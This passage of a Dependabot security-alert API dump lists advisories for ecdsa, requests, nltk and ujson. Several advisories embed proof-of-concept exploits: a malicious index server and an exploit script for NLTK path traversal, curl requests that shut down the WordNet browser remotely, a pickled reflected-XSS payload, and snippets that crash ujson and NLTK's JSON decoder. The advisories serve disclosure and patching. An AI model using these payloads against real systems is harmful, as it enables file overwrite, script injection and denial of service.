`remove_constructed()`\n- `remove_implicit()`\n\nAdditionally, consider catching unexpected internal exceptions in DER key parsing paths and re-raising them as `UnexpectedDER` to avoid crashy failure modes.\n\n## Credit\n\nMohamed Abdelaal (@0xmrma)","severity":"medium","identifiers":[{"value":"GHSA-9f5j-8jwj-x28g","type":"GHSA"},{"value":"CVE-2026-33936","type":"CVE"}],"references":[{"url":"https://github.com/tlsfuzzer/python-ecdsa/security/advisories/GHSA-9f5j-8jwj-x28g"},{"url":"https://github.com/tlsfuzzer/python-ecdsa/commit/bd66899550d7185939bf27b75713a2ac9325a9d3"},{"url":"https://github.com/tlsfuzzer/python-ecdsa/releases/tag/python-ecdsa-0.19.2"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33936"},{"url":"https://github.com/advisories/GHSA-9f5j-8jwj-x28g"}],"published_at":"2026-03-27T15:56:01Z","updated_at":"2026-03-30T20:17:12Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"ecdsa"},"severity":"medium","vulnerable_version_range":"< 0.19.2","first_patched_version":{"identifier":"0.19.2"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","score":5.3},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00053,"percentile":0.16595},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","score":5.3},"cwes":[{"cwe_id":"CWE-20","name":"Improper Input Validation"},{"cwe_id":"CWE-130","name":"Improper Handling of Length Parameter Inconsistency"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"ecdsa"},"severity":"medium","vulnerable_version_range":"< 0.19.2","first_patched_version":{"identifier":"0.19.2"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/101","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/101","created_at":"2026-05-13T05:27:16Z","updated_at":"2026-05-13T05:27:16Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":100,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"requests"},"manifest_path":"methods/EverCore/uv.lock","scope":"development","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-gc5v-m9x4-r6x2","cve_id":"CVE-2026-25645","summary":"Requests has Insecure Temp File Reuse in its extract_zipped_paths() utility function","description":"### Impact\nThe `requests.utils.extract_zipped_paths()` utility function uses a predictable filename when extracting files from zip archives into the system temporary directory. If the target file already exists, it is reused without validation. A local attacker with write access to the temp directory could pre-create a malicious file that would be loaded in place of the legitimate one.\n\n### Affected usages\n**Standard usage of the Requests library is not affected by this vulnerability.** Only applications that call `extract_zipped_paths()` directly are impacted.\n\n### Remediation\nUpgrade to at least Requests 2.33.0, where the library now extracts files to a non-deterministic location.\n\nIf developers are unable to upgrade, they can set `TMPDIR` in their environment to a directory with restricted write access.","severity":"medium","identifiers":[{"value":"GHSA-gc5v-m9x4-r6x2","type":"GHSA"},{"value":"CVE-2026-25645","type":"CVE"}],"references":[{"url":"https://github.com/psf/requests/security/advisories/GHSA-gc5v-m9x4-r6x2"},{"url":"https://github.com/psf/requests/commit/66d21cb07bd6255b1280291c4fafb71803cdb3b7"},{"url":"https://github.com/psf/requests/releases/tag/v2.33.0"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25645"},{"url":"https://github.com/advisories/GHSA-gc5v-m9x4-r6x2"}],"published_at":"2026-03-25T16:56:28Z","updated_at":"2026-03-27T22:07:43Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"requests"},"severity":"medium","vulnerable_version_range":"< 2.33.0","first_patched_version":{"identifier":"2.33.0"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N","score":4.4},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":5.0e-05,"percentile":0.00243},"cvss":{"vector_string":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N","score":4.4},"cwes":[{"cwe_id":"CWE-377","name":"Insecure Temporary File"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"requests"},"severity":"medium","vulnerable_version_range":"< 2.33.0","first_patched_version":{"identifier":"2.33.0"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/100","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/100","created_at":"2026-05-13T05:27:15Z","updated_at":"2026-05-13T05:27:15Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":99,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"nltk"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-469j-vmhf-r6v7","cve_id":"CVE-2026-33236","summary":"NLTK has a Downloader Path Traversal Vulnerability (AFO) - Arbitrary File Overwrite","description":"## Vulnerability Description\n\nThe NLTK downloader does not validate the `subdir` and `id` attributes when processing remote XML index files. Attackers can control a remote XML index server to provide malicious values containing path traversal sequences (such as `../`), which can lead to:\n\n1. **Arbitrary Directory Creation**: Create directories at arbitrary locations in the file system\n2. **Arbitrary File Creation**: Create arbitrary files\n3. **Arbitrary File Overwrite**: Overwrite critical system files (such as `/etc/passwd`, `~/.ssh/authorized_keys`, etc.)\n\n## Vulnerability Principle\n\n### Key Code Locations\n\n**1. XML Parsing Without Validation** (`nltk/downloader.py:253`)\n```python\nself.filename = os.path.join(subdir, id + ext)\n```\n- `subdir` and `id` are directly from XML attributes without any validation\n\n**2. Path Construction Without Checks** (`nltk/downloader.py:679`)\n```python\nfilepath = os.path.join(download_dir, info.filename)\n```\n- Directly uses `filename` which may contain path traversal\n\n**3. Unrestricted Directory Creation** (`nltk/downloader.py:687`)\n```python\nos.makedirs(os.path.join(download_dir, info.subdir), exist_ok=True)\n```\n- Can create arbitrary directories outside the download directory\n\n**4. File Writing Without Protection** (`nltk/downloader.py:695`)\n```python\nwith open(filepath, \"wb\") as outfile:\n```\n- Can write to arbitrary locations in the file system\n\n### Attack Chain\n\n```\n1. Attacker controls remote XML index server\n ↓\n2. Provides malicious XML: \n ↓\n3. Victim executes: downloader.download('passwd')\n ↓\n4. Package.fromxml() creates object, filename = \"../../etc/passwd.zip\"\n ↓\n5. _download_package() constructs path: download_dir + \"../../etc/passwd.zip\"\n ↓\n6. os.makedirs() creates directory: download_dir + \"../../etc\"\n ↓\n7. open(filepath, \"wb\") writes file to /etc/passwd.zip\n ↓\n8. System file is overwritten!\n```\n\n## Impact Scope\n1. **System File Overwrite**\n\n## Reproduction Steps\n\n### Environment Setup\n\n1. Install NLTK\n```bash\npip install nltk\n```\n\n2. Prepare malicious server and exploit script (see PoC section)\n\n### Reproduction Process\n\n**Step 1: Start malicious server**\n```bash\npython3 malicious_server.py\n```\n\n**Step 2: Run exploit script**\n```bash\npython3 exploit_vulnerability.py\n```\n\n**Step 3: Verify results**\n```bash\nls -la /tmp/test_file.zip\n```\n\n## Proof of Concept\n\n### Malicious Server (malicious_server.py)\n\n```python\n#!/usr/bin/env python3\n\"\"\"Malicious HTTP Server - Provides XML index with path traversal\"\"\"\nimport os\nimport tempfile\nimport zipfile\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\n\n# Create temporary directory\nserver_dir = tempfile.mkdtemp(prefix=\"nltk_malicious_\")\n\n# Create malicious XML (contains path traversal)\nmalicious_xml = \"\"\"\n\n \n \n \n\n\"\"\"\n\n# Save files\nwith open(os.path.join(server_dir, \"malicious_index.xml\"), \"w\") as f:\n f.write(malicious_xml)\n\nwith zipfile.ZipFile(os.path.join(server_dir, \"test.zip\"), \"w\") as zf:\n zf.writestr(\"test.txt\", \"Path traversal attack!\")\n\n# HTTP Handler\nclass Handler(BaseHTTPRequestHandler):\n def do_GET(self):\n if self.path == '/malicious_index.xml':\n self.send_response(200)\n self.send_header('Content-type', 'application/xml')\n self.end_headers()\n with open(os.path.join(server_dir, 'malicious_index.xml'), 'rb') as f:\n self.wfile.write(f.read())\n elif self.path == '/test.zip':\n self.send_response(200)\n self.send_header('Content-type', 'application/zip')\n self.end_headers()\n with open(os.path.join(server_dir, 'test.zip'), 'rb') as f:\n self.wfile.write(f.read())\n else:\n self.send_response(404)\n self.end_headers()\n \n def log_message(self, format, *args):\n pass\n\n# Start server\nif __name__ == \"__main__\":\n port = 8888\n server = HTTPServer((\"0.0.0.0\", port), Handler)\n print(f\"Malicious server started: http://127.0.0.1:{port}/malicious_index.xml\")\n print(\"Press Ctrl+C to stop\")\n try:\n server.serve_forever()\n except KeyboardInterrupt:\n print(\"\\nServer stopped\")\n```\n\n### Exploit Script (exploit_vulnerability.py)\n\n```python\n#!/usr/bin/env python3\n\"\"\"AFO Vulnerability Exploit Script\"\"\"\nimport os\nimport tempfile\n\ndef exploit(server_url=\"http://127.0.0.1:8888/malicious_index.xml\"):\n download_dir = tempfile.mkdtemp(prefix=\"nltk_exploit_\")\n print(f\"Download directory: {download_dir}\")\n \n # Exploit vulnerability\n from nltk.downloader import Downloader\n downloader = Downloader(server_index_url=server_url, download_dir=download_dir)\n downloader.download(\"test_file\", quiet=True)\n \n # Check results\n expected_path = \"/tmp/test_file.zip\"\n if os.path.exists(expected_path):\n print(f\"\\n✗ Exploit successful! File written to: {expected_path}\")\n print(f\"✗ Path traversal attack successful!\")\n else:\n print(f\"\\n? File not found, download may have failed\")\n\nif __name__ == \"__main__\":\n exploit()\n```\n\n### Execution Results\n\n```\n✗ Exploit successful! File written to: /tmp/test_file.zip\n✗ Path traversal attack successful!\n```","severity":"high","identifiers":[{"value":"GHSA-469j-vmhf-r6v7","type":"GHSA"},{"value":"CVE-2026-33236","type":"CVE"}],"references":[{"url":"https://github.com/nltk/nltk/security/advisories/GHSA-469j-vmhf-r6v7"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33236"},{"url":"https://github.com/nltk/nltk/commit/89fe2ec2c6bae6e2e7a46dad65cc34231976ed8a"},{"url":"https://github.com/advisories/GHSA-469j-vmhf-r6v7"}],"published_at":"2026-03-19T12:42:42Z","updated_at":"2026-03-25T18:21:28Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"nltk"},"severity":"high","vulnerable_version_range":"<= 3.9.2","first_patched_version":null}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H","score":8.1},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00019,"percentile":0.0532},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H","score":8.1},"cwes":[{"cwe_id":"CWE-22","name":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"nltk"},"severity":"high","vulnerable_version_range":"<= 3.9.2","first_patched_version":null},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/99","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/99","created_at":"2026-05-13T05:27:15Z","updated_at":"2026-05-13T05:27:15Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":98,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"nltk"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-jm6w-m3j8-898g","cve_id":"CVE-2026-33231","summary":"Unauthenticated remote shutdown in nltk.app.wordnet_app","description":"### Summary\n`nltk.app.wordnet_app` allows unauthenticated remote shutdown of the local WordNet Browser HTTP server when it is started in its default mode. A simple `GET /SHUTDOWN%20THE%20SERVER` request causes the process to terminate immediately via `os._exit(0)`, resulting in a denial of service.\n\n### Details\nThe vulnerable logic is in `nltk/app/wordnet_app.py`:\n\n- [`nltk/app/wordnet_app.py:242`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L242)\n - The server listens on all interfaces:\n - `server = HTTPServer((\"\", port), MyServerHandler)`\n\n- [`nltk/app/wordnet_app.py:87`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L87)\n - Incoming requests are checked for the exact path:\n - `if unquote_plus(sp) == \"SHUTDOWN THE SERVER\":`\n\n- [`nltk/app/wordnet_app.py:88`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L88)\n - The shutdown protection only depends on `server_mode`\n\n- [`nltk/app/wordnet_app.py:93`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L93)\n - In the default mode (`runBrowser=True`, therefore `server_mode=False`), the handler terminates the process directly:\n - `os._exit(0)`\n\nThis means any party that can reach the listening port can stop the service with a single unauthenticated GET request when the browser is started in its normal mode.\n\n### PoC\n1. Start the WordNet Browser in Docker in its default mode:\n\n```bash\ndocker run -d --name nltk-wordnet-web-default-retest -p 8004:8004 \\\n nltk-sandbox \\\n python -c \"import nltk; nltk.download('wordnet', quiet=True); from nltk.app.wordnet_app import wnb; wnb(8004, True)\"\n```\n\n2. Confirm the service is reachable:\n\n```bash\ncurl -s -o /tmp/wn_before.html -w '%{http_code}\\n' 'http://127.0.0.1:8004/'\n```\n\nObserved result:\n\n```text\n200\n```\n\n3. Trigger shutdown:\n\n```bash\ncurl -s -o /tmp/wn_shutdown.html -w '%{http_code}\\n' 'http://127.0.0.1:8004/SHUTDOWN%20THE%20SERVER'\n```\n\nObserved result:\n\n```text\n000\n```\n\n4. Verify the service is no longer available:\n\n```bash\ncurl -s -o /tmp/wn_after.html -w '%{http_code}\\n' 'http://127.0.0.1:8004/'\ndocker ps -a --filter name=nltk-wordnet-web-default-retest --format '{{.Names}}\\t{{.Status}}'\ndocker logs nltk-wordnet-web-default-retest\n```\n\nObserved results:\n\n```text\n000\nnltk-wordnet-web-default-retest Exited (0)\nServer shutting down!\n```\n\n### Impact\nThis is an unauthenticated denial-of-service issue in the NLTK WordNet Browser HTTP server.\n\nAny reachable client can terminate the service remotely when the application is started in its default mode. The impact is limited to service availability, but it is still security-relevant because:\n\n- the route is accessible over HTTP\n- no authentication or CSRF-style confirmation is required\n- the server listens on all interfaces by default\n- the process exits immediately instead of performing a controlled shutdown\n\nThis primarily affects users who run `nltk.app.wordnet_app` and expose or otherwise allow access to its listening port.","severity":"high","identifiers":[{"value":"GHSA-jm6w-m3j8-898g","type":"GHSA"},{"value":"CVE-2026-33231","type":"CVE"}],"references":[{"url":"https://github.com/nltk/nltk/security/advisories/GHSA-jm6w-m3j8-898g"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33231"},{"url":"https://github.com/nltk/nltk/commit/bbaae83db86a0f49e00f5b0db44a7254c268de9b"},{"url":"https://github.com/advisories/GHSA-jm6w-m3j8-898g"}],"published_at":"2026-03-19T12:42:20Z","updated_at":"2026-04-25T01:23:11Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"nltk"},"severity":"high","vulnerable_version_range":"<= 3.9.3","first_patched_version":{"identifier":"3.9.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00019,"percentile":0.05214},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cwes":[{"cwe_id":"CWE-306","name":"Missing Authentication for Critical Function"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"nltk"},"severity":"high","vulnerable_version_range":"<= 3.9.3","first_patched_version":{"identifier":"3.9.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/98","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/98","created_at":"2026-05-13T05:27:15Z","updated_at":"2026-05-13T05:27:15Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":97,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"nltk"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-gfwx-w7gr-fvh7","cve_id":"CVE-2026-33230","summary":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in nltk","description":"### Summary\n`nltk.app.wordnet_app` contains a reflected cross-site scripting issue in the `lookup_...` route. A crafted `lookup_` URL can inject arbitrary HTML/JavaScript into the response page because attacker-controlled `word` data is reflected into HTML without escaping. This impacts users running the local WordNet Browser server and can lead to script execution in the browser origin of that application.\n\n### Details\nThe vulnerable flow is in `nltk/app/wordnet_app.py`:\n\n- [`nltk/app/wordnet_app.py:144`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L144)\n - Requests starting with `lookup_` are handled as HTML responses:\n - `page, word = page_from_href(sp)`\n\n- [`nltk/app/wordnet_app.py:755`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L755)\n - `page_from_href()` calls `page_from_reference(Reference.decode(href))`\n\n- [`nltk/app/wordnet_app.py:769`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L769)\n - `word = href.word`\n\n- [`nltk/app/wordnet_app.py:796`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L796)\n - If no results are found, `word` is inserted directly into the HTML body:\n - `body = \"The word or words '%s' were not found in the dictionary.\" % word`\n\nThis is inconsistent with the `search` route, which does escape user input:\n\n- [`nltk/app/wordnet_app.py:136`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L136)\n - `word = html.escape(...)`\n\nAs a result, a malicious `lookup_...` payload can inject script into the response page.\n\nThe issue is exploitable because:\n\n- `Reference.decode()` accepts attacker-controlled base64-encoded pickle data for the URL state.\n- The decoded `word` is reflected into HTML without `html.escape()`.\n- The server is started with `HTTPServer((\"\", port), MyServerHandler)`, so it listens on all interfaces by default, not just `localhost`.\n\n### PoC\n1. Start the WordNet Browser in an isolated Docker environment:\n\n```bash\ndocker run -d --name nltk-wordnet-web -p 8002:8002 \\\n nltk-sandbox \\\n python -c \"import nltk; nltk.download('wordnet', quiet=True); from nltk.app.wordnet_app import wnb; wnb(8002, False)\"\n```\n\n2. Use the following crafted payload, which decodes to:\n\n```python\n(\"\", {})\n```\n\nEncoded payload:\n\n```text\ngAWVIQAAAAAAAACMGTxzY3JpcHQ-YWxlcnQoMSk8L3NjcmlwdD6UfZSGlC4=\n```\n\n3. Request the vulnerable route:\n\n```bash\ncurl -s \"http://127.0.0.1:8002/lookup_gAWVIQAAAAAAAACMGTxzY3JpcHQ-YWxlcnQoMSk8L3NjcmlwdD6UfZSGlC4=\"\n```\n\n4. Observed result:\n\n```text\nThe word or words '' were not found in the dictionary.\n```\n![\"127\"](\"https://github.com/user-attachments/assets/ec09da08-09bc-4fc4-bfc1-c4489e9adaf6\")
\n\n\nI also validated the issue directly at function level in Docker:\n\n```python\nimport base64\nimport pickle\n\nfrom nltk.app.wordnet_app import page_from_href\n\npayload = base64.urlsafe_b64encode(\n pickle.dumps((\"\", {}), -1)\n).decode()\n\npage, word = page_from_href(payload)\nprint(word)\nprint(\"\" in page)\n```\n\nObserved output:\n\n```text\nWORD= \nHAS_SCRIPT= True\n```\n\n### Impact\nThis is a reflected XSS issue in the NLTK WordNet Browser web UI.\n\nAn attacker who can convince a user to open a crafted `lookup_...` URL can execute arbitrary JavaScript in the origin of the local WordNet Browser application. This can be used to:\n\n- run arbitrary script in the browser tab\n- manipulate the page content shown to the user\n- issue same-origin requests to other WordNet Browser routes\n- potentially trigger available UI actions in that local app context\n\nThis primarily impacts users who run `nltk.app.wordnet_app` as a local or self-hosted HTTP service and open attacker-controlled links.","severity":"medium","identifiers":[{"value":"GHSA-gfwx-w7gr-fvh7","type":"GHSA"},{"value":"CVE-2026-33230","type":"CVE"}],"references":[{"url":"https://github.com/nltk/nltk/security/advisories/GHSA-gfwx-w7gr-fvh7"},{"url":"https://github.com/nltk/nltk/commit/1c3f799607eeb088cab2491dcf806ae83c29ad8f"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33230"},{"url":"https://github.com/nltk/nltk/commit/40d0bc1d484a3458d6a63ecb5ba4957ab16ba14e"},{"url":"https://github.com/advisories/GHSA-gfwx-w7gr-fvh7"}],"published_at":"2026-03-18T20:23:33Z","updated_at":"2026-03-25T18:21:03Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"nltk"},"severity":"medium","vulnerable_version_range":"<= 3.9.3","first_patched_version":{"identifier":"3.9.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","score":6.1},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00017,"percentile":0.04074},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","score":6.1},"cwes":[{"cwe_id":"CWE-79","name":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"nltk"},"severity":"medium","vulnerable_version_range":"<= 3.9.3","first_patched_version":{"identifier":"3.9.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/97","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/97","created_at":"2026-05-13T05:27:15Z","updated_at":"2026-05-13T05:27:15Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":96,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"nltk"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-rf74-v2fm-23pw","cve_id":null,"summary":"Natural Language Toolkit (NLTK) has unbounded recursion in JSONTaggedDecoder.decode_obj() may cause DoS","description":"### Summary\n`JSONTaggedDecoder.decode_obj()` in `nltk/jsontags.py` calls itself \nrecursively without any depth limit. A deeply nested JSON structure \nexceeding `sys.getrecursionlimit()` (default: 1000) will raise an \nunhandled `RecursionError`, crashing the Python process.\n\n### Affected code\nFile: `nltk/jsontags.py`, lines 47–52\n```python\n@classmethod\ndef decode_obj(cls, obj):\n if isinstance(obj, dict):\n obj = {key: cls.decode_obj(val) for (key, val) in obj.items()}\n elif isinstance(obj, list):\n obj = list(cls.decode_obj(val) for val in obj)\n```\n\n### Proof of Concept\n```python\nimport sys, json\nfrom nltk.jsontags import JSONTaggedDecoder\n\ndepth = sys.getrecursionlimit() + 50 # e.g. 1050\npayload = '{\"x\":' * depth + \"null\" + \"}\" * depth\n\n# Raises RecursionError, crashing the process\njson.loads(payload, cls=JSONTaggedDecoder)\n```\n\n### Impact\nAny code path that passes externally-supplied JSON to \n`JSONTaggedDecoder` is vulnerable to denial of service.\nThe severity depends on whether such a path exists in the \ncalling code (e.g. `nltk/data.py`).\n\n### Suggested Fix\nAdd a depth parameter with a hard limit:\n```python\n@classmethod\ndef decode_obj(cls, obj, _depth=0):\n if _depth > 100:\n raise ValueError(\"JSON nesting too deep\")\n if isinstance(obj, dict):\n obj = {key: cls.decode_obj(val, _depth + 1) \n for (key, val) in obj.items()}\n elif isinstance(obj, list):\n obj = list(cls.decode_obj(val, _depth + 1) for val in obj)\n```","severity":"medium","identifiers":[{"value":"GHSA-rf74-v2fm-23pw","type":"GHSA"}],"references":[{"url":"https://github.com/nltk/nltk/security/advisories/GHSA-rf74-v2fm-23pw"},{"url":"https://github.com/advisories/GHSA-rf74-v2fm-23pw"}],"published_at":"2026-03-18T20:17:43Z","updated_at":"2026-03-18T20:17:44Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"nltk"},"severity":"medium","vulnerable_version_range":"<= 3.9.3","first_patched_version":null}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N","score":5.1}},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-674","name":"Uncontrolled Recursion"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"nltk"},"severity":"medium","vulnerable_version_range":"<= 3.9.3","first_patched_version":null},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/96","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/96","created_at":"2026-05-13T05:27:15Z","updated_at":"2026-05-13T05:27:15Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":95,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"ujson"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-c8rr-9gxc-jprv","cve_id":"CVE-2026-32875","summary":"UltraJSON has an integer overflow handling large indent leads to buffer overflow or infinite loop","description":"### Summary\n\n`ujson.dumps()` crashes the Python interpreter (segmentation fault) when the product of the `indent` parameter and the nested depth of the input exceeds INT32_MAX. It can also get stuck in an infinite loop if the `indent` is a large negative number. Both are caused by an integer overflow/underflow whilst calculating how much memory to reserve for indentation. And both can be used to achieve denial of service.\n\n(Note: A negative indent to `ujson` means add spaces after colons but do not add line breaks or indentation. It is unclear to the current maintainers whether this was ever even an intended feature or just a byproduct of the way it was written.)\n\n### Exploitability\n\nTo be vulnerable, a service must call `ujson.dump()`/`ujson.dumps()`/`ujson.encode()` whilst giving untrusted users control over the `indent` parameter and not restrict that indentation to reasonably small non-negative values. (Even with the fix for this vulnerability, such usage is strongly advised against since even a bug-free JSON serialiser would be vulnerable to denial of service simply by the attacker requesting indents that have the server needlessly filling out gigabytes of whitespace.)\n\nA service may also be vulnerable to the infinite loop if it uses a fixed _negative_ `indent`. An underflow always occurs for any negative indent when the input data is at least one level nested but, for small negative indents, the underflow is usually accidentally rectified by another overflow. As far as the maintainers are aware, the infinite loop can not be reached for indentations from -1 to -65536 / max_recursion_depth_as_limited_by_stack_size but users of negative indents are encouraged to consider their service affected even if the infinite loop seems unreachable.\n\n### Example\n\n```python\nimport ujson\n\ndef example(depth, indent):\n a = [0]\n for i in range(1000):\n a = [a]\n ujson.dumps(a, indent=indent)\n\nexample(1, 2**30) # segfault\nexample(1000, -200) # infinite loop\n```\n\n### Patches\n\nujson 5.12.0, containing 486bd4553dc471a1de11613bc7347a6b318e37ea, promotes the integer types where the overflow occurred, skips the indentation code path for negative indent (which was supposed to be a no-op) and places an artificial cap of 1000 on the `indent` parameter.\n\n### Workarounds\n\nUsers who don't wish to upgrade can either use a fixed indentation, no indentation or ensure indentation is non-negative and not enormous (below `2**31 / max_recursion_depth_as_limited_by_stack_size`).\n\n### References\n\nThe original bug report can be found at https://github.com/ultrajson/ultrajson/issues/700\n\nThis issue was independently discovered by @coco1629, @EthanKim88 and @vmfunc.","severity":"high","identifiers":[{"value":"GHSA-c8rr-9gxc-jprv","type":"GHSA"},{"value":"CVE-2026-32875","type":"CVE"}],"references":[{"url":"https://github.com/ultrajson/ultrajson/security/advisories/GHSA-c8rr-9gxc-jprv"},{"url":"https://github.com/ultrajson/ultrajson/issues/700"},{"url":"https://github.com/ultrajson/ultrajson/commit/486bd4553dc471a1de11613bc7347a6b318e37ea"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32875"},{"url":"https://github.com/advisories/GHSA-c8rr-9gxc-jprv"}],"published_at":"2026-03-18T13:01:24Z","updated_at":"2026-03-20T21:19:57Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"ujson"},"severity":"high","vulnerable_version_range":">= 5.1.0, <= 5.11.0","first_patched_version":{"identifier":"5.12.0"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00069,"percentile":0.21015},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cwes":[{"cwe_id":"CWE-190","name":"Integer Overflow or Wraparound"},{"cwe_id":"CWE-787","name":"Out-of-bounds Write"},{"cwe_id":"CWE-835","name":"Loop with Unreachable Exit Condition ('Infinite Loop')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"ujson"},"severity":"high","vulnerable_version_range":">= 5.1.0, <= 